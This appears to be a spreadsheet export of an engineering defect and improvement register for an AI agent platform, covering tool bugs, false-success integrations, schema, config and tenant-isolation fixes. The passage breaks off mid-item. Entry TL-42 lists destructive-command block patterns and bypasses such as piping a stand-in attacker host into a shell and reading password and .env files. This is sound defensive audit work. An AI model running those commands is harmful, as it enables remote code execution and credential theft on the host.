    <t>| **TL-30** | One of the two `ToolResult` classes | The Pydantic one at [`ai/tools/base.py:48`](../../../backend/src/ai/tools/base.py:48) and the dataclass at [`ai/tool_executor.py:39`](../../../backend/src/ai/tool_executor.py:39) share a name and no fields. Collapse to one type with a typed output envelope. Blocked on [TL-41](#tl-41--four-dispatch-paths-and-the-typed-one-fails-silently) | ✅ Verified |</t>
  </si>
  <si>
    <t>TL-31</t>
  </si>
  <si>
    <t>The accurate-trim fallback in _ffmpeg raises ValueError</t>
  </si>
  <si>
    <t>### TL-31 — The accurate-trim fallback in `_ffmpeg` raises `ValueError`
**✅ Verified · Medium**
`trim_clip` builds `[..., "-c", "copy", output_path]`. When stream-copy trimming fails —
the keyframe-boundary case the fallback exists for — the recovery path does:
```python
reenc[-2:-1] = []       # comment says 'drop "-c"'; actually removes "copy"
reenc.remove("copy")    # ValueError: list.remove(x): x not in list
```
The slice already removed `"copy"`, so `remove` throws. `video_edit` catches broad
`Exception`, so the user-visible result is
`video_edit trim failed: list.remove(x): x not in list` and the re-encode never runs.
- [`ai/tools/media/video/_ffmpeg.py`](../../../backend/src/ai/tools/media/video/_ffmpeg.py) — `trim_clip`, the `except FFmpegError` branch
**Fix:** remove the `-c copy` pair by index and insert the codec flags, or build the
re-encode argv from scratch rather than mutating.</t>
  </si>
  <si>
    <t>5. T3 — Correctness and robustness</t>
  </si>
  <si>
    <t>TL-32</t>
  </si>
  <si>
    <t>Blocking SDK calls on the event loop in video_generate</t>
  </si>
  <si>
    <t>### TL-32 — Blocking SDK calls on the event loop in `video_generate`
**✅ Verified · Medium**
`client.models.generate_videos`, `client.operations.get`, `client.files.download` and
`generated.video.save` are synchronous. They run directly in the async handler, stalling
the worker for the full length of a Veo generation — up to the 360 s poll ceiling.
- [`ai/tools/media/video/video_generate.py`](../../../backend/src/ai/tools/media/video/video_generate.py) — `_generate_single_video`
**Fix:** `asyncio.to_thread` around each blocking call.
---</t>
  </si>
  <si>
    <t>TL-33</t>
  </si>
  <si>
    <t>A registry SELECT per tool call inside the REACT loop</t>
  </si>
  <si>
    <t>### TL-33 — A registry `SELECT` per tool call inside the REACT loop
**✅ Verified · Medium**
Both cost blocks run an `IntegrationRegistry` query for **every single tool result**,
inside the per-turn loop, with no caching. A research agent making 25 searches issues 25
round-trips for a value that changes daily.
- [`ai/step_executor.py:446`](../../../backend/src/ai/step_executor.py:446)–504 — direct `TOOL_CALL` path
- [`ai/step_executor.py:918`](../../../backend/src/ai/step_executor.py:918) onwards — REACT path
**Fix:** cache per company for the life of the run. `ToolCostResolver` already has the
cache — see [TL-19](#tl-19--four-price-tables-one-of-which-is-the-unused-source-of-truth).
---</t>
  </si>
  <si>
    <t>TL-34</t>
  </si>
  <si>
    <t>Metadata drift between code and DB is permanent by design</t>
  </si>
  <si>
    <t>### TL-34 — Metadata drift between code and DB is permanent by design
**✅ Verified · Medium**
`sync_built_in_tools` inserts a row for every registered tool that has none, and
**never updates an existing row**. A changed description or function schema never
reaches the database, so the admin UI drifts from the code forever with no way to
reconcile short of deleting rows.
- [`ai/tool_management_service.py:240`](../../../backend/src/ai/tool_management_service.py:240)–268
---</t>
  </si>
  <si>
    <t>TL-35</t>
  </si>
  <si>
    <t>_BUILTIN_CATEGORIES covers 22 of 98 tools</t>
  </si>
  <si>
    <t>### TL-35 — `_BUILTIN_CATEGORIES` covers 22 of 98 tools
**✅ Verified · Low**
The category map has 22 entries. The 64 social tools, the 4 CRM tools, the 8 meta tools
and `batch_web_search` all fall through to `general`. Separately, `social` appears in
the frontend's hardcoded `CATEGORIES` list but is **not** a value in the backend map, so
the UI offers a filter that matches nothing.
- [`ai/tool_management_service.py:30`](../../../backend/src/ai/tool_management_service.py:30)–50
- [`frontend/src/pages/ai/ToolManagement.tsx`](../../../frontend/src/pages/ai/ToolManagement.tsx) — `CATEGORIES`
**Fix:** derive the category from the tool's subpackage rather than maintaining a hand-written map.
---</t>
  </si>
  <si>
    <t>TL-36</t>
  </si>
  <si>
    <t>terminal scans all of /tmp and mis-attributes artifacts</t>
  </si>
  <si>
    <t>### TL-36 — `terminal` scans all of `/tmp` and mis-attributes artifacts
**✅ Verified · Medium**
After every command, `TerminalTool` walks all of `/tmp` to depth 3 looking for
`.pptx/.docx/.xlsx/.pdf` files with `mtime &gt;= since_ts`, and registers what it finds as
artifacts of the current run. Any document another process — or another tenant's run —
writes to `/tmp` during that window is attributed to this run.
`SandboxCodeTool`'s narrower directory diff has the same class of problem, which is why
it has grown an exclusion list (`venv`, `__pycache__`, `node_modules`, `scripts`,
`.git`, `scratch`).
- [`ai/tools/sandbox/terminal_tool.py`](../../../backend/src/ai/tools/sandbox/terminal_tool.py) — the second-pass `/tmp` scan
- [`ai/tools/sandbox/sandbox_executor.py`](../../../backend/src/ai/tools/sandbox/sandbox_executor.py) — `_register_new_artifacts`
**Fix:** an explicit write-only artifacts drop box (see
[TL-16](#tl-16--the-tenant-workspace-lives-in-tmp-and-is-node-local)). A file becomes an
artifact because a tool put it there, not because a scanner guessed. This deletes both
heuristics and the exclusion list.</t>
  </si>
  <si>
    <t>TL-37</t>
  </si>
  <si>
    <t>The social base class never retries 429 or 5xx</t>
  </si>
  <si>
    <t>### TL-37 — The social base class never retries 429 or 5xx
**✅ Verified · Medium**
`_api_request` re-raises every `httpx.HTTPStatusError` immediately with the comment
"Don't retry client errors" — but the `except` catches **all** status errors, so 429 and
5xx are never retried either. That is precisely the class of error social APIs return
under load. The two retries it does have cover only `TimeoutException` and
`ConnectError`, and they are immediate: no sleep, no backoff, no jitter.
The only real exponential backoff in the tool layer is SerpAPI-specific.
- [`ai/tools/social/base.py:130`](../../../backend/src/ai/tools/social/base.py:130) — `_api_request`
- [`ai/tools/core/search.py:155`](../../../backend/src/ai/tools/core/search.py:155) — the one correct backoff, for contrast
---</t>
  </si>
  <si>
    <t>TL-38</t>
  </si>
  <si>
    <t>No pagination in any social list call</t>
  </si>
  <si>
    <t>### TL-38 — No pagination in any social list call
**✅ Verified · Medium**
Every `list` / `search` / `get_*` action across all 16 platforms returns page one and
reports it to the model as the complete set. No cursor is read, no `next` is followed,
and no truncation is signalled.
- All of [`ai/tools/social/`](../../../backend/src/ai/tools/social/)
---</t>
  </si>
  <si>
    <t>TL-39</t>
  </si>
  <si>
    <t>No idempotency on any write tool</t>
  </si>
  <si>
    <t>### TL-39 — No idempotency on any write tool
**✅ Verified · Medium**
No social, email, CRM or media tool carries an idempotency key. Combined with the
resilience layer's reformat-retry and fallback chain, a retried or resumed step
re-posts, re-comments, re-sends and re-creates campaigns.
`email_classify` has a related non-atomicity: it implements "move" as COPY → `STORE
+FLAGS \Deleted` → `EXPUNGE`. If the copy succeeds and the expunge fails you get a
duplicate; if the process dies between them the original stays put.
- [`ai/tools/resilience.py`](../../../backend/src/ai/tools/resilience.py) — the retry paths
- [`ai/tools/email/email_tool.py:267`](../../../backend/src/ai/tools/email/email_tool.py:267) — `EmailClassifyTool`
---</t>
  </si>
  <si>
    <t>TL-40</t>
  </si>
  <si>
    <t>Eight of sixteen platforms cannot refresh their tokens</t>
  </si>
  <si>
    <t>### TL-40 — Eight of sixteen platforms cannot refresh their tokens
**✅ Verified · Medium**
`quora`, `pinterest`, `meta_ads`, `linkedin_ads`, `linkedin_sales_navigator`,
`youtube_ads`, `x_ads` and `snapchat_ads` have no entry in
`PLATFORM_REFRESH_CONFIG`. When the access token expires the tool fails and a human must
reconnect — with no proactive warning anywhere in the product.
- [`ai/social_connection_service.py:23`](../../../backend/src/ai/social_connection_service.py:23) — `PLATFORM_REFRESH_CONFIG`
---</t>
  </si>
  <si>
    <t>TL-41</t>
  </si>
  <si>
    <t>Four dispatch paths, and the typed one fails silently</t>
  </si>
  <si>
    <t>### TL-41 — Four dispatch paths, and the typed one fails silently
**✅ Verified · Medium**
A tool can be entered through `run`, `run_with_context`, `run_typed`, or the executor's
reflection fallback. The typed path adds nothing in practice: both implementations
(`WebSearchTool`, `ScraperTool`) simply re-serialise their params to JSON and call
`run_with_context`.
Worse, the reflection is silent. If `get_type_hints(tool.run_typed)` raises — a forward
reference, a missing import — the executor logs at DEBUG and uses the legacy string
path. A typed tool will appear to work while never using its types.
The knock-on cost is large: because structured arguments are serialised to a JSON string
and re-parsed inside each tool, a substantial fraction of tool code is defensive
parsing. `pdf_generator` is 746 lines, most of it input rescue;
`batch_web_search` has a five-step parsing ladder.
- [`ai/tool_executor.py:125`](../../../backend/src/ai/tool_executor.py:125) onwards — reflection and the silent fallback
- [`ai/tools/base.py`](../../../backend/src/ai/tools/base.py) — `run`, `run_with_context`, `run_typed`, `supports_context`</t>
  </si>
  <si>
    <t>**Fix:** one method — `execute(params: ParamsModel, ctx: ExecutionContext) -&gt; ToolOutput`
— with the JSON schema derived from the params model rather than hand-written. Resolves
[TL-05](#tl-05--the-typed-dispatch-path-silently-drops-execution-context-in-scraper_tool)
and [TL-30](#4-t2--delete) at the same time.
---</t>
  </si>
  <si>
    <t>TL-42</t>
  </si>
  <si>
    <t>The terminal blocklist is a speed bump, not a boundary</t>
  </si>
  <si>
    <t>### TL-42 — The `terminal` blocklist is a speed bump, not a boundary
**✅ Verified · Medium**
Thirteen regexes (`rm -rf /`, `mkfs`, `dd of=/dev/`, fork bomb, `shutdown`, `reboot`,
`halt`, `poweroff`, `init 0`, `init 6`, `&gt; /dev/sd[a-z]`, `chmod 777 /`) cannot
enumerate the dangerous half of a shell. `curl attacker.example | sh`, `cat
/etc/passwd`, `env`, `rm -rf ~` and reading the backend's own `.env` all pass.
This is acceptable **only** once [TL-01](#tl-01--the-default-sandbox-runs-llm-authored-code-as-the-backend-os-user)
is fixed and the container is the real boundary. Until then it is the only thing
standing between a prompt injection and the host.
- [`ai/tools/sandbox/terminal_tool.py:45`](../../../backend/src/ai/tools/sandbox/terminal_tool.py:45) — `_BLOCKED_PATTERNS`
---</t>
  </si>
  <si>
    <t>TL-43</t>
  </si>
  <si>
    <t>youtube_upload_video never uploads the video</t>
  </si>
  <si>
    <t>T4</t>
  </si>
  <si>
    <t>### TL-43 — `youtube_upload_video` never uploads the video
**✅ Verified · High**
The tool POSTs metadata to `https://www.googleapis.com/youtube/v3/videos` with
`uploadType=resumable` and returns `{"success": true, "message": "Video upload initiated
on YouTube"}`. It never sends the media: the required `Location` header is not read, no
second request is made, and the `video_url` parameter is **read from params and then
never used**. `thumbnail_url` is likewise accepted and ignored.
- [`ai/tools/social/youtube.py`](../../../backend/src/ai/tools/social/youtube.py) — `YouTubeUploadVideoTool._execute`
**Fix:** target `googleapis.com/upload/youtube/v3/videos`, capture the `Location`
header, stream the file in chunked PUTs, then call `thumbnails/set`. Resolve the source
through an artifact reference rather than a URL string.
---</t>
  </si>
  <si>
    <t>6. T4 — Integrations that report false success</t>
  </si>
  <si>
    <t>TL-44</t>
  </si>
  <si>
    <t>tiktok_publish_video returns success on init</t>
  </si>
  <si>
    <t>### TL-44 — `tiktok_publish_video` returns success on init
**✅ Verified · High**
Calls `post/publish/video/init/` and returns `{"success": true}` on the resulting
`publish_id`. TikTok publication is asynchronous — the video may still fail moderation,
download or encoding — and the tool never polls `post/publish/status/fetch/`.
The `PULL_FROM_URL` source also requires the URL's domain to be verified with TikTok;
that requirement is neither documented in the description nor surfaced as an error.
- [`ai/tools/social/tiktok.py`](../../../backend/src/ai/tools/social/tiktok.py) — `TikTokPublishVideoTool._execute`
---</t>
  </si>
  <si>
    <t>TL-45</t>
  </si>
  <si>
    <t>instagram_publish_media does not wait for video containers</t>
  </si>
  <si>
    <t>### TL-45 — `instagram_publish_media` does not wait for video containers
**✅ Verified · High**
`_publish_single` creates the media container and immediately calls `media_publish`.
That is correct for images. For `reel` and video it is not: the container is processed
asynchronously and must be polled on `status_code` until `FINISHED` before publishing.
As written, every Reel publish races the encoder.
- [`ai/tools/social/instagram.py`](../../../backend/src/ai/tools/social/instagram.py) — `_publish_single`, `_publish_carousel`
---</t>
  </si>
  <si>
    <t>TL-46</t>
  </si>
  <si>
    <t>video_generate ignores is_audio_required and reports it back</t>
  </si>
  <si>
    <t>### TL-46 — `video_generate` ignores `is_audio_required` and reports it back
**✅ Verified · Medium**
The parameter is parsed, never passed to `GenerateVideosConfig`, and then returned in
the result as `"has_audio": is_audio_required` — so the model is told a setting was
applied that was not.
Two related issues in the same file: `person_generation="allow_all"` is hardcoded rather
than being tenant policy, and `register_video_artifact` receives no `run_id` or
`agent_id`, so generated videos are orphaned from their run.
- [`ai/tools/media/video/video_generate.py`](../../../backend/src/ai/tools/media/video/video_generate.py) — `run_with_context`, `_generate_single_video`
- [`ai/tools/media/video/_support.py`](../../../backend/src/ai/tools/media/video/_support.py) — `register_video_artifact`
---</t>
  </si>
  <si>
    <t>TL-47</t>
  </si>
  <si>
    <t>linkedin_create_post advertises image_url and never reads it</t>
  </si>
  <si>
    <t>### TL-47 — `linkedin_create_post` advertises `image_url` and never reads it
**✅ Verified · Medium**
The function schema offers `image_url` with the description *"Optional image URL to
attach to the post"*. `_execute` handles `link_url` and nothing else — the parameter is
silently dropped. The model will use it, and the post will publish without the image.
This is the clearest instance of the schema/implementation drift class: the schema is
what the LLM sees, and nothing validates it against the code.
- [`ai/tools/social/linkedin.py`](../../../backend/src/ai/tools/social/linkedin.py) — `LinkedInCreatePostTool`, schema vs `_execute`
**Fix:** implement the three-step LinkedIn asset upload, or delete the field. Then add a
test that asserts every advertised parameter is read.
---</t>
  </si>
  <si>
    <t>TL-48</t>
  </si>
  <si>
    <t>LinkedIn-Version: 202401 is hardcoded in twelve places</t>
  </si>
  <si>
    <t>### TL-48 — `LinkedIn-Version: 202401` is hardcoded in twelve places
**✅ Verified · Medium**
Every LinkedIn call pins the January 2024 version header. LinkedIn sunsets versioned
APIs roughly a year after release, so as of this writing the header is about two and a
half years stale and calls will start returning 426 / 400.
- [`ai/tools/social/linkedin.py`](../../../backend/src/ai/tools/social/linkedin.py) — 4 occurrences
- [`ai/tools/social/linkedin_ads.py`](../../../backend/src/ai/tools/social/linkedin_ads.py) — 4 occurrences
- [`ai/tools/social/linkedin_sales_nav.py`](../../../backend/src/ai/tools/social/linkedin_sales_nav.py) — 4 occurrences
**Fix:** one constant, sourced from config, with an owner and a review date. The same
applies to the Google Ads version pin — see [TL-25](#4-t2--delete).
---</t>
  </si>
  <si>
    <t>TL-49</t>
  </si>
  <si>
    <t>google_ads_create_campaign is non-transactional</t>
  </si>
  <si>
    <t>### TL-49 — `google_ads_create_campaign` is non-transactional
**✅ Verified · Medium**
The tool performs two independent mutates: create a campaign budget, then create the
campaign referencing it. If the second fails, the budget is orphaned in the account with
no compensating delete and no mention in the error returned to the model — which will
typically retry and orphan another.
This is otherwise the best-built family in `social/`: it correctly reads `customer_id`
and `developer_token` from server-side `oauth_metadata` and starts campaigns `PAUSED`.
- [`ai/tools/social/google_ads.py`](../../../backend/src/ai/tools/social/google_ads.py) — `GoogleAdsCreateCampaignTool._execute`
**Fix:** wrap both operations in a single `googleAds:mutate` request with a temporary
resource id, which is what the API provides for exactly this case.
---</t>
  </si>
  <si>
    <t>PO-I1</t>
  </si>
  <si>
    <t>Stop blocking a worker on human approval</t>
  </si>
  <si>
    <t>Improvement</t>
  </si>
  <si>
    <t>### PO-I1 — Stop blocking a worker on human approval
**Effect: large.** See [PO-20](#po-20--a-long-hitl-timeout-ties-up-a-worker). Moving
from "block and poll" to "pause and re-enqueue" frees worker capacity in direct
proportion to how much HITL a tenant uses. It also makes long approval windows a
product feature instead of a capacity problem.</t>
  </si>
  <si>
    <t>6. Improvements</t>
  </si>
  <si>
    <t>PO-I2</t>
  </si>
  <si>
    <t>Show the cost of a hierarchy before it is run</t>
  </si>
  <si>
    <t>### PO-I2 — Show the cost of a hierarchy before it is run
**Effect: large.** Every extra level in an `ACTION → SKILL → AGENT → PROCESS` tree
adds a full perceive-strategise-act-critique cycle. `SeedDocFactoryLite` exists only
because a 50-entity hierarchy was multiplying LLM calls.
The builder should show an estimated per-run cost as the tree is assembled, using the
same `cost_estimator` the planner already has. Users cannot avoid a cost they cannot
see.</t>
  </si>
  <si>
    <t>PO-I3</t>
  </si>
  <si>
    <t>Warn in the builder when a child entity is not ACTIVE</t>
  </si>
  <si>
    <t>### PO-I3 — Warn in the builder when a child entity is not ACTIVE
**Effect: medium.** A `PROCESS` whose children are still `DRAFT` will fail at
dispatch. The graph editor already runs a validation pass on every change; add the
status check there so the problem is caught at build time, not at run time.</t>
  </si>
  <si>
    <t>PO-I4</t>
  </si>
  <si>
    <t>Make the template clone report what it cloned</t>
  </si>
  <si>
    <t>### PO-I4 — Make the template clone report what it cloned
**Effect: medium.** `clone_template` walks three separate discovery paths — the
`parent_id` FK, the `hierarchy.children` JSON, and the static plan's
`CHILD_ENTITY_INVOCATION` targets. When a seed wires children in only one of those
ways, a partial clone is possible and nothing says so. Return the list of cloned ids
and show it in the toast.</t>
  </si>
  <si>
    <t>PO-I5</t>
  </si>
  <si>
    <t>Replace the 10-second approvals poll with the existing SSE channel</t>
  </si>
  <si>
    <t>### PO-I5 — Replace the 10-second approvals poll with the existing SSE channel
**Effect: medium.** `HITLPanel` polls `GET /ai/approvals/pending` every 10 seconds for
every open browser tab. The platform already publishes `approval_required` on the
run's Redis channel. Reusing it removes a constant background query and makes
approvals appear instantly.</t>
  </si>
  <si>
    <t>PO-I6</t>
  </si>
  <si>
    <t>Cache the partner entity fan-out</t>
  </si>
  <si>
    <t>### PO-I6 — Cache the partner entity fan-out
**Effect: medium.** `GET /ai/entities` runs one extra query **per child tenant** for
`partner_admin` and `partner_user`, then merges and de-duplicates in Python. A partner
with 50 tenants pays 51 queries for one page load. One query with
`company_id IN (...)` replaces the whole loop.</t>
  </si>
  <si>
    <t>PO-I7</t>
  </si>
  <si>
    <t>Give the wallet a low-balance warning before the run dies</t>
  </si>
  <si>
    <t>### PO-I7 — Give the wallet a low-balance warning before the run dies
**Effect: medium.** The credit circuit breaker stops a run mid-flight with *"Partial
results saved. Please top up credits and retry."* By then the money is spent and the
work is half done. A pre-run estimate compared against the balance would let the
platform refuse to start a run it cannot afford to finish.</t>
  </si>
  <si>
    <t>PO-I8</t>
  </si>
  <si>
    <t>One number for "how many tools do I have"</t>
  </si>
  <si>
    <t>### PO-I8 — One number for "how many tools do I have"
**Effect: medium.** Today there are three different true answers: 98 registered
classes, 34 usable ones, 16 social modules, 9 connectable platforms. Every surface
quotes a different one. Pick "tools an agent in this company can actually call today"
and show that everywhere.</t>
  </si>
  <si>
    <t>PO-I9</t>
  </si>
  <si>
    <t>Surface failed router mounts on the health endpoint</t>
  </si>
  <si>
    <t>### PO-I9 — Surface failed router mounts on the health endpoint
**Effect: small, high value at 3am.** See
[PO-10](#po-10--a-broken-import-turns-a-whole-feature-area-into-404s). Collect the
`ImportError`s into a list and return it from `/health`. Diagnosing a missing feature
area becomes one curl instead of a log search.</t>
  </si>
  <si>
    <t>PO-I10</t>
  </si>
  <si>
    <t>Let the entity builder test one step</t>
  </si>
  <si>
    <t>### PO-I10 — Let the entity builder test one step
**Effect: large for users.** Today the only way to know whether a prompt template or a
tool binding works is to run the whole entity and pay for it. A "run this step only"
button against a saved draft would cut the build-test loop from minutes and dollars to
seconds and cents.</t>
  </si>
  <si>
    <t>PO-I11</t>
  </si>
  <si>
    <t>Show total_cost_usd and billed_amount side by side, always</t>
  </si>
  <si>
    <t>### PO-I11 — Show `total_cost_usd` and `billed_amount` side by side, always
**Effect: small.** Both live on `execution_runs` and they are different numbers.
Reporting on the wrong one misstates revenue. Any screen that shows one should show
both, labelled "our cost" and "charged".</t>
  </si>
  <si>
    <t>PO-I12</t>
  </si>
  <si>
    <t>Add a "what does this company actually have" page</t>
  </si>
  <si>
    <t>### PO-I12 — Add a "what does this company actually have" page
**Effect: medium.** Support questions today ("why did my agent fail?") usually resolve
to one of: no LLM integration, no credits, an entity still in `DRAFT`, a tool that is
`EXPERIMENTAL`, or an unclaimed phone number. All five are one query each. One
diagnostic page for a tenant admin would remove most support load.
---</t>
  </si>
  <si>
    <t>SA-I1</t>
  </si>
  <si>
    <t>Serve the frontend as a build, not a dev server</t>
  </si>
  <si>
    <t>### SA-I1 — Serve the frontend as a build, not a dev server
**Effect: large.** The React SPA is served by `vite` (`npm run dev`) in production,
with `hmr: false` to stop it reloading. There is a `build` script; the deploy scripts
do not use it.
A dev server is slower, holds more memory, does no minification or asset hashing, and
has a much larger attack surface than a directory of static files behind Apache.
Switching to `npm run build` plus an Apache `DocumentRoot` removes a whole process from
the box.</t>
  </si>
  <si>
    <t>SA-I2</t>
  </si>
  <si>
    <t>One config object, one source of truth</t>
  </si>
  <si>
    <t>### SA-I2 — One config object, one source of truth
**Effect: medium.** There are three settings classes today: `common.config.Settings`,
`gateway.gateway_config.UnifiedGatewaySettings`, and the legacy
`gateway.config.GatewaySettings`. They overlap on `DATABASE_URL`, `REDIS_URL`,
`STREAMING_HOST` and `STREAMING_PROTOCOL`, and they **disagree on the defaults** —
which is the direct cause of [SA-03](#sa-03--the-gateways-default-database-port-is-wrong).
Delete the legacy one, and have the gateway import shared values from
`common.config` rather than redeclaring them.</t>
  </si>
  <si>
    <t>SA-I3</t>
  </si>
  <si>
    <t>Validate config at boot instead of at first use</t>
  </si>
  <si>
    <t>### SA-I3 — Validate config at boot instead of at first use
**Effect: medium.** `extra="ignore"` means a typo'd key in `backend/.env` is silently
dropped. `STREAMING_HOST` pointing at a dead port is only discovered when a call comes
in. `JWT_SECRET` mismatch is never discovered at all.
A startup check — required keys present, no placeholder secrets, database and Redis
reachable, `STREAMING_HOST` resolvable — turns a class of 3am problems into a failed
boot with a clear message.</t>
  </si>
  <si>
    <t>SA-I4</t>
  </si>
  <si>
    <t>Give the worker a health signal</t>
  </si>
  <si>
    <t>### SA-I4 — Give the worker a health signal
**Effect: large.** When the Arq worker dies, the API keeps accepting executions and
every run sits in `PENDING` forever. Nothing surfaces an error to the user. The
document calls this "the most common *the platform looks broken but nothing is
logging* failure".
A heartbeat key in Redis plus a check on `/health` would turn a silent stall into a
visible alarm. A "runs stuck in PENDING for more than N minutes" count would be even
better.</t>
  </si>
  <si>
    <t>SA-I5</t>
  </si>
  <si>
    <t>Cache the suspension check</t>
  </si>
  <si>
    <t>### SA-I5 — Cache the suspension check
**Effect: medium.** See [SA-18](#sa-18--suspension-middleware-costs-a-database-round-trip-on-every-request).
One Redis lookup with a 60-second TTL replaces one Postgres round trip per request.</t>
  </si>
  <si>
    <t>SA-I6</t>
  </si>
  <si>
    <t>Split the worker pool by job type</t>
  </si>
  <si>
    <t>### SA-I6 — Split the worker pool by job type
**Effect: medium.** One worker runs everything: agent executions (up to 2 hours),
document processing, campaign dialling and seven crons. A long `PROCESS` run occupies
a slot that a 3-second document embed also needs.
`CHILD_RUN_QUEUE` was the first step towards this and was never finished. Two worker
pools — one for interactive/short jobs, one for long runs — would stop head-of-line
blocking without any change to the job code.</t>
  </si>
  <si>
    <t>SA-I7</t>
  </si>
  <si>
    <t>Make the layout lint part of the merge gate</t>
  </si>
  <si>
    <t>### SA-I7 — Make the layout lint part of the merge gate
**Effect: medium.** `backend/scripts/lint_ai_layout.py` is 271 lines of real, working
architecture policy: package line caps, forbidden imports, the `tools/` root rule. It
runs only when someone remembers to type the command.
The repository has no functioning CI at all (see
[19 — Testing](19-TESTING-DEFECTS.md) and D-14 in the platform register), so this is
blocked on that — but it is the cheapest useful check to add first.</t>
  </si>
  <si>
    <t>SA-I8</t>
  </si>
  <si>
    <t>Make the SSE terminal signal a field, not a substring</t>
  </si>
  <si>
    <t>### SA-I8 — Make the SSE terminal signal a field, not a substring
**Effect: small, prevents a nasty bug.** The API's SSE generator breaks out of the loop
when the raw JSON contains `"status": "COMPLETED"`, `"FAILED"` or `"CANCELLED"`. It is
a substring match on a serialised payload. `agent_loop_sse.py` copies `outcome` into a
`status` key purely to make this work.
Parse the event and check the field. Both sides then stop being coupled through a
string.</t>
  </si>
  <si>
    <t>SA-I9</t>
  </si>
  <si>
    <t>Fix the observability compose file before anyone needs it</t>
  </si>
  <si>
    <t>### SA-I9 — Fix the observability compose file before anyone needs it
**Effect: small, high value in an incident.** Two problems make the bundled monitoring
stack fail on first use: `prometheus.yml` scrapes `host.docker.internal:8000`, which
does not resolve on stock Linux Docker without an `extra_hosts` entry; and the Grafana
container publishes **port 3000**, which collides with the Vite dev server.
Both are one-line fixes, and both will be discovered at exactly the wrong moment.</t>
  </si>
  <si>
    <t>SA-I10</t>
  </si>
  <si>
    <t>Record why a router failed to mount</t>
  </si>
  <si>
    <t>### SA-I10 — Record why a router failed to mount
**Effect: small.** Same point as PO-10 in
[01 — Product overview](01-PRODUCT-OVERVIEW-DEFECTS.md), from the architecture side:
about a dozen routers are mounted inside `try/except ImportError` with a
`logger.warning`. Collect the failures into a list and expose it on `/health`.
---</t>
  </si>
  <si>
    <t>DM-I1</t>
  </si>
  <si>
    <t>Add the indexes the queries already assume</t>
  </si>
  <si>
    <t>### DM-I1 — Add the indexes the queries already assume
**Effect: large, cheap.** [DM-05](#dm-05--execution_runs-has-no-index-on-company_id-or-entity_id)
and [DM-06](#dm-06--log-tables-have-no-indexes-at-all) together are four index
statements. `execution_runs`, `llm_interaction_logs` and `tool_interaction_logs` are the
three fastest-growing tables in the database and none of them is indexed on the column
every query filters by. Do this before anything else in this file.</t>
  </si>
  <si>
    <t>DM-I2</t>
  </si>
  <si>
    <t>Denormalise company_id onto the log tables</t>
  </si>
  <si>
    <t>### DM-I2 — Denormalise `company_id` onto the log tables
**Effect: large.** See [DM-09](#dm-09--log-tables-have-no-tenant-column-so-an-unjoined-query-sees-everything).
Adding `company_id` to `llm_interaction_logs`, `tool_interaction_logs` and
`human_approvals` does two things at once: it removes a join from every reporting query,
and it turns a forgotten filter from a cross-tenant leak into a scoped query.</t>
  </si>
  <si>
    <t>DM-I3</t>
  </si>
  <si>
    <t>Partition or archive execution_trace_events</t>
  </si>
  <si>
    <t>### DM-I3 — Partition or archive `execution_trace_events`
**Effect: large over time.** This table gets one row per span — dozens per iteration,
hundreds per run — and it is pure observability. It is deliberately kept out of CORTEX
so it can be pruned independently, but **nothing prunes it**.
Add a retention job, or partition by month and drop old partitions. Decide the retention
window now, while the table is small.</t>
  </si>
  <si>
    <t>DM-I4</t>
  </si>
  <si>
    <t>Move the nine entity JSON columns to JSONB</t>
  </si>
  <si>
    <t>### DM-I4 — Move the nine entity JSON columns to `JSONB`
**Effect: medium.** They are the most-read JSON in the system — every dispatch reads
`capabilities`, `planning` and `governance`. `JSONB` parses once at write instead of on
every read, and supports GIN indexing so "which entities use tool X" stops being a full
scan with Python-side filtering.</t>
  </si>
  <si>
    <t>DM-I5</t>
  </si>
  <si>
    <t>One updated_at trigger instead of onupdate in Python</t>
  </si>
  <si>
    <t>### DM-I5 — One `updated_at` trigger instead of `onupdate` in Python
**Effect: small.** `onupdate=datetime.utcnow` only fires on ORM updates. Any raw SQL
update — and there is plenty of raw SQL, especially around `feature_flags` and pgvector
— leaves `updated_at` stale. A database trigger is correct for both paths.</t>
  </si>
  <si>
    <t>DM-I6</t>
  </si>
  <si>
    <t>Give the CORTEX tables a tenant column</t>
  </si>
  <si>
    <t>### DM-I6 — Give the CORTEX tables a tenant column
**Effect: medium.** `cortex_nodes` and `cortex_edges` can only be scoped by joining
`cortex_trees`. They are also the biggest tables in the memory subsystem and the target
of every vector search. The same argument as DM-I2 applies, with more force because the
search SQL is hand-written and easy to get wrong.</t>
  </si>
  <si>
    <t>DM-I7</t>
  </si>
  <si>
    <t>Make clean_db.sql derive its table list</t>
  </si>
  <si>
    <t>### DM-I7 — Make `clean_db.sql` derive its table list
**Effect: small, prevents confusion.** Query `information_schema.tables` and truncate
everything except the explicit keep-list (`subscription_tiers`, built-in
`tool_registry_entries`, `alembic_version`). The current hand-maintained array is
already six tables out of date.</t>
  </si>
  <si>
    <t>DM-I8</t>
  </si>
  <si>
    <t>Cast the four text-numeric columns</t>
  </si>
  <si>
    <t>### DM-I8 — Cast the four text-numeric columns
**Effect: medium.** [DM-11](#4-t2--wrong-types-and-dead-tables) is four `ALTER COLUMN
... USING ...::numeric` statements. Doing it now, with little data, is a five-minute
migration. Doing it after a year of rows is a maintenance window.</t>
  </si>
  <si>
    <t>DM-I9</t>
  </si>
  <si>
    <t>Add a schema census to the merge gate</t>
  </si>
  <si>
    <t>### DM-I9 — Add a schema census to the merge gate
**Effect: medium.** Compare every `__tablename__` and column against the database built
from `alembic upgrade head` on a clean instance. That single check would have caught
[DM-01](#dm-01--subscription_tiers-has-no-migration) and
[DM-02](#dm-02--phone_numbers-is-created-by-a-script-not-a-migration) the day they were
introduced. Blocked on there being any CI at all — see
[19 — Testing](19-TESTING-DEFECTS.md).</t>
  </si>
  <si>
    <t>DM-I10</t>
  </si>
  <si>
    <t>Store money as one type everywhere</t>
  </si>
  <si>
    <t>### DM-I10 — Store money as one type everywhere
**Effect: small.** Today there are three scales in use: `Numeric(10,4)` for run cost,
`Numeric(18,6)` for usage cost, `Numeric(14,6)` for billed amount. Sums across them
round at different points. Pick one scale for internal cost and one for customer-facing
charges, and use them consistently.
---</t>
  </si>
  <si>
    <t>AU-I1</t>
  </si>
  <si>
    <t>Make tenant scoping structural instead of remembered</t>
  </si>
  <si>
    <t>### AU-I1 — Make tenant scoping structural instead of remembered
**Effect: the largest single change available in this register.** Today isolation is
`WHERE company_id = ...` typed by hand in every service method across ~40 tables. There
is no row-level security, no query filter, and no test that would catch a missing one.
Two options, in increasing order of strength:
1. A `TenantSession` wrapper that requires a `company_id` and applies the filter for
   you. Cheap, and it makes the forgotten filter impossible **in code that uses it**.
2. Postgres row-level security with `SET LOCAL app.company_id`. Correct even for raw SQL
